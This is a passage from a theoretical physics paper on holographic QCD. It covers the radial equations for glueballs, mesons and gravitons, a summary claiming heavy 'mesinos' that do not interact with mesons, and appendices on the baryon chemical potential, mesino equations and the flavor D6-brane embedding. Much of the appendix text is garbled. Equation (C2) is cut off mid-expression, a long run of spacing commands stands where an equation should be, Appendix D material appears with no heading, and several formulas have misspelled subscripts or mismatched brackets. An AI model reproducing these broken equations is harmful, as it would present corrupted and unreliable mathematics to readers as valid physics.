\rho}_{\lambda}F^{c\ \lambda}_{\nu}\right)\)), \(\delta A^{MN}=\delta^{M}_{2}\delta^{N}_{2}\delta A_{23}\), \(\partial_{\mu}\left(\sqrt{-g}g^{22}g^{33}g^{\mu\nu}\partial\delta A_{23}\right)=0\). * \(1^{++}\) glueball: The EOM for the radial profile function of the vector-type \({\cal M}\)-theory metric perturbation \(h_{ti}=h_{it}=g_{x^{1}x^{1}}G(r)e^{ikx^{1}},i=x^{2},x^{3}:R^{(1)}_{\mu\nu} \approx 0,\ R^{(1)}_{\mu\nu}\) denoting the first-order fluctuations in the Ricci tensor as a consequence of linear metric perturbations. **Mesons**[19]: Working with the redefined radial variable \(Z:r=r_{h}e^{Z}\), after integrating out the blown-up \(S^{2}_{\rm squashed}\) in the DBI action of the flavor type IIA \(D6\)-branes and KK reduction of the gauge field \(A_{\mu}(x^{\mu},Z)=\sum_{n=1}B^{(n)}_{\mu}(x^{\mu})\alpha^{\{\mu\}}_{n}(Z),\mu =t,x^{i=1,2,3}\), the terms in the DBI action quadratic in the gauge field fluctuations are: \(\int d^{4}xdZ\left(\mathcal{V}_{2}(Z)F^{(n)}_{\mu\nu}F^{\mu\nu}_{(n)}\alpha^{ \{\mu\}}_{m}(Z)\alpha^{\{\mu\}}_{n}(Z)+\mathcal{V}_{1}(Z)B^{(m)}_{\mu}B^{(n)} _{\nu}\dot{\alpha}^{\{\mu\}}_{m}\dot{\alpha}^{\{\mu\}}_{n}\right)\). 
The EOM for the radial profile \(\alpha^{\{i\}}_{m}(Z)\) is \(:\frac{d}{dZ}\left(\mathcal{V}_{1}(Z)\dot{\alpha}^{\{i\}}_{m}\right)+2\mathcal{ V}_{2}(Z)\mathcal{M}^{\{i\}}_{(m)}\alpha^{\{i\}}_{m}=0\), where \(\mathcal{V}_{1}(Z)=e^{-\Phi^{IIA}}\sqrt{hg}g^{ZZ}\sqrt{\det_{2,\tilde{y}}\left( i^{*}g+B\right)}\sqrt{\det_{2,\tilde{y}}\left(i^{*}g+B\right)}\) and \(\mathcal{V}_{2}(Z)=e^{-\Phi^{IIA}}\frac{h}{2}\sqrt{\det_{2,\tilde{y}}\left(i^ {*}(g+B)\right)}\sqrt{\det_{2^{1,3},|Z|}(i^{*}g)}\). The solution of \(\alpha^{\{i\}}\) is given in terms of the Tricomi Hypergeometric and associated Laguerre functions. **Graviton**[28]: In the context of obtaining the Page curve of an eternal black hole from the \({\cal M}\)-theory dual containing a black-hole in the ETW(End of The World)-"brane" (a hypersurface \(AdS^{\infty}_{4}\times_{w}M_{6},\times_{w}\) implying a warped product, with \(G_{4}\) fluxes threading a homologous sum of four-cycles \(S^{3}_{\rm squashed}\times[0,1]\) and \(S^{2}_{\rm squashed}\times S^{2}_{\rm squashed}\) in \(M_{6}=M_{5}(\theta_{1,2},\phi_{1,2},\psi)\times S^{1}(x^{10})\hookrightarrow M ^{SU(4)/Spin(7)}_{8}(t,r,\theta_{1,2},\phi_{1,2},\psi,x^{10})\), with a finite "tension" coupled to a non-conformal QCD bath in the doubly holographic approach, the massless graviton wavefunction with the graviton localized on the ETW-brane trapped in a "volcano"-like potential, is given in terms of the Tricomi Hypergeometric and associated Laguerre functions. Solutions to the EOMs for the aforementioned field fluctuations/radial profile function are given in terms of the Tricomi Hypergeometric and associated Laguerre functions. The reason is that the relevant near-\(r_{h}\) EOMs for \(0^{-+},0^{--},1^{++}\)-glueballs [22], and the radial profile function of the graviton wave function [28] are _all_ of the type: \[(r-r_{h})\xi^{\prime\prime}(r)+\left(b+c(r-r_{h})\right)\xi^{\prime}(r)+(f+(r-r _{h})G)\xi(r)=0, \tag{70}\] whose solution is given as: \[\xi(r\sim r_{h})=e^{-\frac{1}{2}r\left(\sqrt{c^{2}-4G}+c\right)} \Bigg{[}c_{1}U\left(\frac{b\left(c+\sqrt{c^{2}-4G}\right)-2f}{2\sqrt{c^{2}-4G}},b, \sqrt{c^{2}-4G}(r-r_{h})\right)+c_{2}L_{\frac{2f-b\left(c+\sqrt{c^{2}-4G} \right)}{2\sqrt{c^{2}-4G}}}^{b-1}\left(\sqrt{c^{2}-4G}(r-r_{h})\right)\right] \Bigg{]}. \tag{71}\] In the context of the radial profile functions of vector mesons [19], and mesinos at \(T>T_{c}\) in equation (27), after appropriate coordinate redefinitions, the near-horizon (IR) solutions are also given in terms of the Tricomi Hypergeometric and Associate Laguerre functions. ## 8 Summary The immensely popular holographic QCD dual of [8] suffered from the longstanding problem that the Mesinos were nearly isospectral with the mesons, with non-vanishing/un(large-\(N\)-)suppressed mesino-mesino-meson interaction [9]- both in direct conflict with real QCD. What we show is that using the type IIA Strominger-Yau-Zaslow mirror of the UV-complete [2] (unlike [8] which caters only to the IR) as constructed in [1] inclusive of \(\mathcal{O}(R^{4})\) corrections worked out in [3], not only is it possible to have super-massive mesinos that do not interact with the mesons, the results obtained (mesino wave function, mass, mesino-mesino-meson interaction) receive no \(\mathcal{O}(R^{4})\) corrections up to \(\mathcal{O}\left(\frac{l_{0}^{6}}{N^{a}}\right),\alpha\geq 1\). 
Thus, the _"WISP"(Weakly Interacting Super-massive Particles)y mesinos and non-renormalization of their wave functions and mass up to \(\mathcal{O}(R^{4})\), together, apart from solving a longstanding problem, also provide a major and new insight into the fermionic sector of top-down holographic duals close to real thermal QCD._ Further, the product of the quark mass and chiral condensate may be conjectured to correspond to the coefficient of the leading non-constant term in the flavor \(D6\)-branes' embedding's fluctuation, with the RG-invariance of the former [27] corresponding to the non-renormalization up to \(\mathcal{O}(R^{4})\) of the latter. In the end, we would also point out that there is a rather intriguing wave-function universality in the form of the appearance of (appropriate) Tricomi Hypergeometric and Associate Laguerre function in the glueball/meson/graviton (apart from mesinoic) spectroscopies. ### Acknowledgements AM is partly supported by a Core Research Grant number SER-1829-PHY from the Science and Engineering Research Board, Govt. of India. GY is supported by a Senior Research Fellowship (SRF) from the Council of Scientific and Industrial Research, Govt. of India. We thank Nick Evans for a useful clarification. GY thanks the Infosys Foundation for the partial support at CMI. Finite Baryon Chemical Potential We explicitly show the generation of a finite baryon chemical potential. From equation (27) (\(f(r)\) being valid \(\forall r\)), up to LO in N, \(k^{\rm UV}(r)=1-3\frac{a^{2}}{r^{2}},f(r)=\frac{2N^{2/5}r^{6}}{729\pi g_{s} \alpha_{1}^{3}\alpha_{2}^{3}}\) and integrating \(\frac{\kappa\sqrt{k^{\rm UV}(r)}}{\sqrt{\kappa^{2}+f^{2}(r)}}\), one obtains: \[A_{t}(r\in{\rm UV})\sim\frac{1}{\sqrt{i\left(r^{2}-3a^{2}\right)}}\] \[\times\Bigg{\{}(-1)^{2/3}\sqrt[4]{3}a\sqrt{1-\frac{3a^{2}}{r^{2}} }\Bigg{(}F\left[\sin^{-1}\left(\frac{3^{3/4}\sqrt[4]{\kappa}\sqrt[4]{\frac{ \kappa}{2}}\sqrt{i\left(r^{2}-3a^{2}\right)}\sqrt[4]{g_{s}}\alpha_{1}^{2/3} \sqrt[4]{\alpha_{2}}}{ar^{\frac{1}{3}}\sqrt[4]{\alpha_{2}}}\right)|\frac{1}{2 }\left(1-i\sqrt{3}\right)\right]\] \[-\Pi\left[\frac{3a^{2/3}\kappa^{2/3}\sqrt[4]{\kappa}\sqrt[4]{g_{ s}}\alpha_{1}^{4/3}\alpha_{2}^{2/3}}{a^{2}N^{2/15}};\sin^{-1}\left(\frac{3^{3/4} \sqrt[4]{\kappa}\sqrt[4]{\kappa}\sqrt[4]{\frac{\kappa}{2}}\sqrt[4]{i\left(r^ {2}-3a^{2}\right)}\sqrt[4]{g_{s}}\alpha_{b_{1}}^{2/3}\sqrt[4]{\alpha_{2}}}{ ar^{\frac{1}{3}}\sqrt[4]{N}}\right)|\frac{1}{2}\left(1-i\sqrt{3}\right)\right] \Bigg{\}}\] \[\sim\frac{3\kappa\sqrt{\pi}\alpha_{\Theta_{1}}^{2}\alpha_{\Theta_ {2}}\left(1-\frac{3a^{2}}{r^{2}}\right)^{3/2}\sqrt{g_{s}}}{\sqrt{2}a^{2}\sqrt [4]{N}},\] (A1) \(F(\phi|\mu)\equiv\int_{0}^{\phi}\frac{d\alpha}{\sqrt{1-m^{2}\sin^{2}\alpha}}\), being the incomplete elliptic integral of the first kind, and \(\Pi(\nu;\phi|\mu)\equiv\int_{0}^{\phi}\frac{d\alpha}{(1-\nu^{2}\sin^{2}\alpha )\sqrt{1-\mu^{2}\sin^{2}\alpha}}\) being the incomplete integral of the fourth kind, generating a finite baryon chemical potential: \[\mu=\frac{3\sqrt{\pi}\kappa\alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}\sqrt{g _{s}}}{\sqrt{2}a^{2}\sqrt[4]{N}}.\] (A2) ## Appendix B EOM-Related for Massive Mesinos The EOM for the radial profile \(R_{2,n}(r)\) of the Mesino \(\Theta\), as defined in equation (26), is given by: \[\frac{\Gamma^{\underline{1}\underline{2}}E_{\underline{1}}^{*}(r) R_{2,n}^{\prime}(r)}{E_{\underline{1}}^{*}(r)}\Theta_{2,0}+R_{2,n}^{\prime}(r) \left(\Gamma^{\underline{1}\underline{5}}\left(\frac{E_{\underline{1}}^{*}(r) 
}{E_{\underline{1}}^{*}(r)}\right)^{\prime}-\frac{\Gamma^{\underline{1} \underline{2}}ip\ E_{\underline{2}}^{*^{2}}(r)}{E_{\underline{1}}^{*}(r)}- \frac{\Gamma^{\underline{1}\underline{2}}}{\omega_{r}^{\underline{8}}\ 10}(r)+2\pi i(2n+1)T\right)\Theta_{2,0}\] \[+R_{2,n}(r)\bigg{(}-\frac{\pi^{2}\Gamma^{\underline{1}\underline {5}}(2n+1)^{2}T^{2}E_{\underline{1}}^{*}(r)}{E_{\underline{1}}^{*}(r)}+\frac{ \pi\Gamma^{\underline{1}\underline{2}\underline{5}}(2n+1)p\ TE_{\underline{2}}^{*^ {2}}(r)}{E_{\underline{2}}^{*}(r)}+\frac{\Gamma^{\underline{1}\underline{2} ip}\ E_{\underline{2}}^{*^{2}}(r)\mathcal{J}^{\prime}(r)}{E_{\underline{1}}^{*}(r) \mathcal{J}(r)}\] \[+\frac{\Gamma^{\underline{1}\underline{5}}p\ ^{2}E_{\underline{2}}^{*^{2}}(r)^{2}}{E_{ \underline{1}}^{*}(r)^{2}}\omega_{r}^{\underline{9}\ 10}-\frac{\pi\Gamma^{\underline{2}\underline{5}}(2n+1) ip\ TE_{\underline{2}}^{*^{2}}(r)}{E_{\underline{1}}^{*}(r)}\frac{\omega_{r}^{\underline{ 4}\ 10}}{\mathcal{J}(r)}-\frac{\pi i(2n+1)T\mathcal{J}^{\prime}(r)}{\mathcal{J}(r)}+ \mathcal{J}(r)\omega_{r}^{\underline{9}\ 10}(r)\Gamma^{\underline{1}\underline{5}}-i\pi\left(\frac{E_{ \underline{2}}^{*^{2}}}{E_{\underline{1}}^{*}}\right)^{\prime}\Gamma^{ \underline{1}\underline{2}}\bigg{)}\Theta_{2,0}=0,\] (B1) with \(a=7,8\) respectively for the TH, BH backgrounds with suitable aforementioned definitions for \(\mathcal{J}(r)\). * \(T<T_{c}\): Writing \(M_{\rm Mesino}=\tilde{M}_{\rm Mesino}\frac{r_{0}}{\sqrt{g_{s}N}}\), the constants appearing in the Schrodinger-like EOM (30)-(32), are given as under: \[a_{1}\equiv\frac{r_{0}^{2}}{\sqrt{3\pi g_{s}N}};\ a_{2}\equiv\frac{23r_{0}}{12 \sqrt{3\pi g_{s}N}};\ b_{1}\equiv\frac{23r_{0}}{12\sqrt{3\pi g_{s}N}};\ b_{6} \equiv-\frac{23\sqrt{\pi}g_{s}N}{4\sqrt{3}r_{0}^{3}},\] \[{\cal A}_{\Theta_{2}^{\prime}}\equiv-\frac{1511.7\sqrt{r_{0}} \alpha_{\theta_{2}}}{{g_{s}}^{7/2}\kappa_{2}\log NMN^{2}{V_{f}}^{2}\alpha_{ \theta_{1}}^{2}},\] \[{\cal B}_{\Theta_{2}^{\prime}}\equiv a_{2}+\frac{2^{3/2}\tilde{M}_{ \rm Mesino}\pi^{1/4}}{\left(g_{s}N\right)^{1/4}}+2i(2n+1)\pi T,\] \[{\cal A}_{\Theta_{2}}\equiv\frac{-\frac{39.4\tilde{M}_{\rm Mesino }}{\sqrt{g_{s}}\sqrt{N}}+T\left(n(-39.5a_{6}^{\beta}r_{0}T-(125i))-(62.5i)-39.5 a_{6}^{\beta}n^{2}r_{0}T-9.9a_{6}^{\beta}r_{0}T\right)}{r_{0}},\] \[{\cal B}_{\Theta_{2}}\equiv\frac{M\left(\lambda_{5}^{2}{g_{s}}^{1 5/4}\kappa_{2}^{2}\log N^{2}\tilde{M}_{\rm Mesino}(0.1n+0.1)N^{3/20}{N_{f}}^{2 }{r_{0}}^{4}T\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{8}-1.1\lambda_{5}{g_ {s}}^{3/2}\kappa_{2}\log N\tilde{M}_{\rm Mesino}^{2}{N_{f}}{r_{0}}^{2}\alpha _{\theta_{2}}\alpha_{\theta_{1}}^{4}+6.84N^{3/5}\right)}{\lambda_{5}^{2}\sqrt{ g_{s}}\kappa_{2}\log N{r_{0}}^{11/2}\alpha_{\theta_{1}}^{6}\alpha_{\theta_{2}}^{ 3}},\] \[{\cal C}_{\Theta_{2}}\equiv\frac{\frac{786.1\tilde{M}_{\rm Mesino }}{\sqrt{g_{s}}\sqrt{N}}+T\left(n\left(-39.5b_{6}{r_{0}}^{2}T+(0.\ +2485.6i)\right)+(1242.8i)-39.5b_{6}n^{2}{r_{0}}^{2}T-9.9b_{6}{r_{0}}^{2}T\right) }{{r_{0}}^{2}},\] (B2) \[\lambda_{5}\] being the parameter in terms of which the co-frames of the relevant non-Kahler six-folds were worked out in [3], \(g_{\theta_{2}\theta_{2}}^{\rm IIA}(r\sim r_{0})\sim\kappa_{2}\sqrt{g_{s}N}\) and, \[a_{6}^{\beta}\equiv\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{{r_{0}}^{2}}+\frac{ \beta\sqrt{g_{s}}M\left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642\alpha_{ \theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4}\right) \log^{3}(r_{0})}{4374\sqrt{\pi}\epsilon^{5}\log N^{4}N^{3/4}{N_{f}}{r_{0}}^{4 }\alpha_{\theta_{2}}^{3}}.\] 
(B3) * \(T>T_{c}\): Based on \[E_{\Xi}^{r}=\frac{\sqrt{\frac{9a_{2}^{2}+r^{2}}{6a^{2}+r^{2}}}\sqrt{ r^{4}-{r_{h}}^{4}}\left(1-\frac{1}{2}\beta\left({\cal C}_{zz}-2{\cal C}_{ \theta_{1}z}+2{\cal C}_{\theta_{1}z}\right)\right)}{\sqrt{2}\sqrt[4]{\pi}\sqrt {g_{s}}\sqrt{N}r},\] \[E_{\Xi}^{t}=\frac{\sqrt{2}\sqrt{\pi}\sqrt[4]{g_{s}}\sqrt{N}r}{ \sqrt{r^{4}-{r_{h}}^{4}}}+\frac{27\left(9b^{2}+1\right)^{4}\beta b^{10}\sqrt {g_{s}}Mr^{2}\Sigma\left(6a^{2}+{r_{h}}^{2}\right)(r-2r_{h})\log^{3}(r_{h})}{ 2\sqrt{2}\pi^{3/4}\left(3b^{2}-1\right)^{5}\left(6b^{2}+1\right)^{4}\log N^{4 }NN{f_{h}}^{4}\alpha_{\theta_{2}}^{3}\left(9a^{2}+{r_{h}}^{2}\right)\sqrt{r^{4 }-{r_{h}}^{4}}},\] \[\omega_{r}^{\frac{8}{2}\ 10}=-\frac{7N^{3/5}}{\lambda_{5}{g_{s}}^{3/2} \kappa_{2}\log NN_{f}r^{2}\alpha_{\theta_{1}}^{4}\alpha_{\theta_{2}}\left(r^{2} -3.3a^{2}\right)}\] \[+\frac{\kappa_{\frac{8}{2}\ 10}a^{8}\sqrt{\beta}\sqrt{{\cal C}_{ zz}}{\rm const}\lambda_{5}{g_{s}}^{5/4}MN^{19/20}N_{f}\sqrt{\alpha_{\theta_{1}}} \sqrt{1-\frac{{r_{h}}^{4}}{r^{4}}}\log(r)}{r^{4}\alpha_{\theta_{2}}^{6}\left( r^{2}-3.a^{2}\right)^{2}\sqrt{\frac{6a^{2}+r^{2}}{9a^{2}+r^{2}}}},\] (B4) with \(\Sigma\equiv-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{4}\), and setting consistently the \({\cal O}(R^{4})\) corrections of \({\cal M}\)-theory's three-form potential to zero requires: \({\cal C}_{zz}-2{\cal C}_{\theta_{1}z}=0\) and \(|{\cal C}_{\theta_{1}x}|\ll 1\)[3], we see that \(E_{\Xi}^{r}\) receives no \({\cal O}(\beta)\) corrections. Further, the constants appearing in the EOM for massive mesinos are therefore given below: \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E_{ \text{L}}^{\text{T}}}} =\frac{\beta\sqrt{g_{s}}M\left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4 }\right)\log^{3}(r_{h})}{17496\sqrt{\pi}e^{5}\left(\log N\right)^{4}N^{3/4}N_{ f}r_{h}{}^{3}\alpha_{\theta_{2}}^{3}}+\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{4r_{h}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\left(\frac{E_{\text{L}}^{\text{ T}}}{E_{\text{L}}^{\text{T}}}\right)^{\prime}} =\frac{2\beta M\left(-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{ 4}\right)\log^{3}(r_{h})}{6561\pi^{3/2}e^{5}\sqrt{g_{s}}\left(\log N\right)^{4} N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}}+\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{rt} =-\frac{14}{3\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}+\frac{4\beta M\left(-19683 \sqrt{6}\alpha_{\theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}} ^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{4}\right)\sqrt{\frac{6a^{2}+r_{h}{}^{2}}{ 9a^{2}+r_{h}{}^{2}}}\log^{3}(r_{h})}{6561\sqrt{3}\pi^{3/2}e^{5}\sqrt{g_{s}} \left(\log N\right)^{4}N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{2\sqrt{2}\sqrt[4]{\pi}\sqrt{g_{s}}\sqrt{N}}{\sqrt{r_{h}{}^{3}}}- \frac{4\sqrt{\frac{2}{3}}\beta\sqrt[4]{g_{s}}M\left(-19683\sqrt{6}\alpha_{ \theta_{1}}^{6}-6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6} \alpha_{\theta_{2}}^{4}\right)\left(6a^{2}+r_{h}{}^{2}\right)\log^{3}(r_{h})} {6561\pi^{3/4}e^{5}\left(\log N\right)^{4}NN_{f}r_{h}{}^{7}/{}^{2}\alpha_{ 
\theta_{2}}^{3}\left(9a^{2}+r_{h}{}^{2}\right)},\] \[\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}} =\frac{\sqrt{\frac{2}{2}}\pi^{3/4}{g_{s}}^{{}^{3/4}}N^{3/4}}{r_{h}{}^{3/2}}+ \frac{{\beta g_{s}}^{{}^{3/4}}M\sqrt{\frac{1}{N}}\left(19683\sqrt{6}\alpha_{ \theta_{1}}^{6}+6642\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}-40\sqrt{6} \alpha_{\theta_{2}}^{4}\right)\log^{3}(r_{h})}{2187\sqrt{2}\sqrt{\pi}e^{5} \left(\log N\right)^{4}N_{f}r_{h}{}^{7}/{}^{2}\alpha_{\theta_{2}}^{3}},\] \[a_{2}^{M_{\text{Mquino}}}_{\beta} \equiv-\frac{21.9}{\sqrt{g_{s}N}}+\mathcal{C}^{M_{\text{Mquino}}}_{rt}\] \[\mathcal{A}^{M_{\text{Mquino}}}_{1} =\pi^{2}\left(-(2n+1)^{2}\right)T^{2}\left(\frac{\beta\sqrt{g_{s}}M \left(19683\sqrt{6}\alpha_{\theta_{1}}^{6}+6642\alpha_{\theta_{2}}^{2}\alpha_{ \theta_{1}}^{3}-40\sqrt{6}\alpha_{\theta_{2}}^{4}\right)\log^{3}(r_{h})}{17496 \sqrt{\pi}e^{5}\left(\log N\right)^{4}N^{3/4}N_{f}r_{h}{}^{3}\alpha_{\theta_{2} }^{3}}\right.\] \[\left.+\frac{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}{4r_{h}}\right)-(0. +3.3i)(2n+1)T,\] \[\mathcal{A}^{M_{\text{Mquino}}}_{2} =\frac{2\beta M\left(-19683\sqrt{6}\alpha_{\theta_{1}}^{6}-6642 \alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+40\sqrt{6}\alpha_{\theta_{2}}^{ 4}\right)\log^{3}(r_{h})}{6561\pi^{3/2}e^{5}\sqrt{g_{s}}\left(\log N\right)^{4 }N^{7/4}N_{f}r_{h}\alpha_{\theta_{2}}^{3}}-\frac{1.3r_{h}}{\sqrt{g_{s}}\sqrt{N }}+\frac{4r_{h}}{\sqrt{3\pi}\sqrt{g_{s}}\sqrt{N}}+2i\pi(2n+1)T,\] \[\mathcal{B}^{M_{\text{Mquino}}}_{1} =1.1\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L}}^{\text{T}}}{E _{\text{L}}^{\text{T}}}}+(2n+1)T\mathcal{C}^{M_{\text{Mquino}}}_{\frac{E_{\text{L} }^{\text{T}}}{E_{\text{L}}^{\text{T}}}}.\] (B5) Appendix C \(\tilde{z}=\)Constant Embedding of Flavor \(D6\)-Branes Inclusive of \(\mathcal{O}(\beta)\) Corrections The EOM for the embedding of the flavor \(D6\)-branes in the warped squashed resolved conifold \(\tilde{z}=\tilde{z}(r)=\tilde{z}_{(0)}+\beta\tilde{z}_{(1)}\), up to \(\mathcal{O}(\beta)\), is given by: \[\frac{N^{3/5}N_{f}r^{2}\left(r^{4}-r_{h}{}^{4}\right)\left(\log N-3 \log(r_{h})\right)\left(\tilde{z}^{\prime}_{(0)}+\beta\tilde{z}^{\prime}_{(1)} \right)}{4\sqrt{6}\pi^{7/4}{g_{s}}^{{}^{3/4}}\alpha_{\theta_{1}}^{2}\alpha_{ \theta_{2}}^{5/2}\sqrt{\frac{4\sqrt{\pi}\sqrt{g_{s}}^{{}^{2}}\alpha_{\theta_{2}}^{3} \left(6a^{2}+r^{2}\right)}{9a^{2}+r^{2}}+3\sqrt{3}N^{2/5}\left(r^{4}-r_{h}{}^{4} \right)\left(\tilde{z}^{\prime}_{(0)}+\beta\tilde{z}^{\prime}_{(1)}\right)^{2}}}\] \[-\frac{0.0005\beta MN^{87/20}r_{h}{}^{5}\left(-492.1\alpha_{ \theta_{1}}^{6}-67.8\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{6}+\alpha_{ \theta_{2}}^{4}\right)\left(r-r_{h}{}^{2}\log^{3}(r_{h})(\log N-3\log(r_{h})) \tilde{z}^{\prime}_{(0)}(r)\right.}{\epsilon^{5}{g_{s}}^{{}^{5/2}}\log N^{4} \alpha_{\theta_{1}}^{6}\alpha_{\theta_{2}}^{6}\left(9a^{2}+r_{h}{}^{2}\right)}=K^{(0 )}+\beta K^{(1)}.\] (C1) At \(\mathcal{O}(\beta^{0})\), (C1) yields: \[\tilde{z}^{\prime}_{(0)}=\pm\frac{8\sqrt{6}\pi^{2}{g_{s}}^{{}^{3/4}}K^{(0)} \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{5/2}\sqrt{\frac{\sqrt{g_{s}}\tau^{ 2}\alpha_{\theta_{2}}^{3}\left(6a^{2}+r^{2}\right)}{9a^{2}+r^ From (C2), one obtains \(\tilde{z}(r)\in\mathbb{R}\) if \(K^{(0)}=0\) (irrespective of whether one performs first a large-\(N\) followed by a small-\(r\) expansion or vice versa). 
In a similar manner, at \(\mathcal{O}(\beta)\), \[\tilde{z}_{(1)}=c_{1}\] \[\begin{split}& 4\pi^{2}g_{s}{}^{s/4}K^{(1)}r\alpha_{ \theta_{1}}^{2}\alpha_{\theta_{2}}^{11/2}\sqrt{6a^{2}+r^{2}}\\ &\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \ \[\mu_{2}\equiv\frac{2\sqrt{\mathcal{A}_{2}^{M_{\text{Mamino }}2}-2\mathcal{C}_{\frac{E_{1}^{ \text{T}}}{\mathcal{E}_{1}^{\text{T}}}}}^{\frac{1}{\mathcal{E}_{1}^{\text{T}}}} \frac{\mathcal{E}_{2}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}{\mathcal{C}_{ \frac{E_{1}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}^{\frac{M_{\text{Mamino }}}{\mathcal{E}_{1}^{\text{T}}}}}+1\] \[=1+4.9\sqrt{-(0.25\,+0.4i)n+(0.1\,-0.2i)-0.3n^{2}}+\mathcal{O}\left(\frac{ \beta\gamma}{\mathcal{N}^{5/4}}\right),\] \[\mu_{3}\equiv\frac{i\sqrt{6}\pi^{3/4}{g_{s}}^{3/4}N^{3/4}pu}{{r_{h}}^{5/2}}+ \frac{\frac{i\sqrt{2}{g_{s}}^{3/4}Mpu}{{r_{h}}^{2}}\left(19683\sqrt{6}\alpha_ {\text{g}_{s}}^{6}+6642\alpha_{\text{g}_{s}}^{2}\alpha_{\text{g}_{s}}^{3}-40 \sqrt{6}\alpha_{\text{g}_{s}}^{4}\right)\log^{3}(r_{h})}{2187\sqrt[4]{\pi} \epsilon^{5}\log N^{4}\sqrt{N}{f_{r}}{n}^{9/2}\alpha_{\text{g}_{s}}^{3}}\] \[\Lambda\equiv\mu_{1}-\frac{2i\mathcal{B}_{2}^{M_{\text{Mamino }}}}{\mathcal{C}_{\frac{E_{2}^{\text{T}}}{\mathcal{E}_{1}^{\text{T}}}}^{M_{ \text{Mamino}}}}=2.5\sqrt{-(0.3\,+0.4i)n+(0.1\,-0.2i)-0.3n^{2}}+(-0.9i)n+(1\,- 0.4i)+\mathcal{O}\left(\frac{\beta\gamma}{\mathcal{N}^{5/4}}\right).\] ## Appendix E Summary of Applications of Top-Down Holographic QCD [1, 3] One of the authors (AM) has been working on the top-down holographic QCD for the past few years. The holographic dual of finite \(N\) QCD was first constructed in [1] and then \(\mathcal{O}(R^{4})\) corrections to [1] were obtained in [3]. Following is the summary of results obtained in this direction. 
* **Summary of Applications of [1]**: In [15], transport coefficients such as shear viscosity, diffusion constant, electrical conductivity, charge susceptibility, etc., of black \(M3\)-branes (black \(M5\)-branes wrapping a homologous sum of two cycles) in the MQGP limit were obtained, and it was found that the ratio of shear viscosity to entropy density is \(1/4\pi\). In [12], the deconfinement temperature and the mass scale of the first-generation quarks were obtained without the inclusion of \(\mathcal{O}(R^{4})\) corrections relevant to thermal QCD. Further, the thermodynamic stability and \(G_{2}\) structure of [1] and the temperature dependence of the electrical conductivity and charge susceptibility were also discussed in [12, 29]. In this process, Einstein's law was verified by computing the ratio of the electrical conductivity to the charge 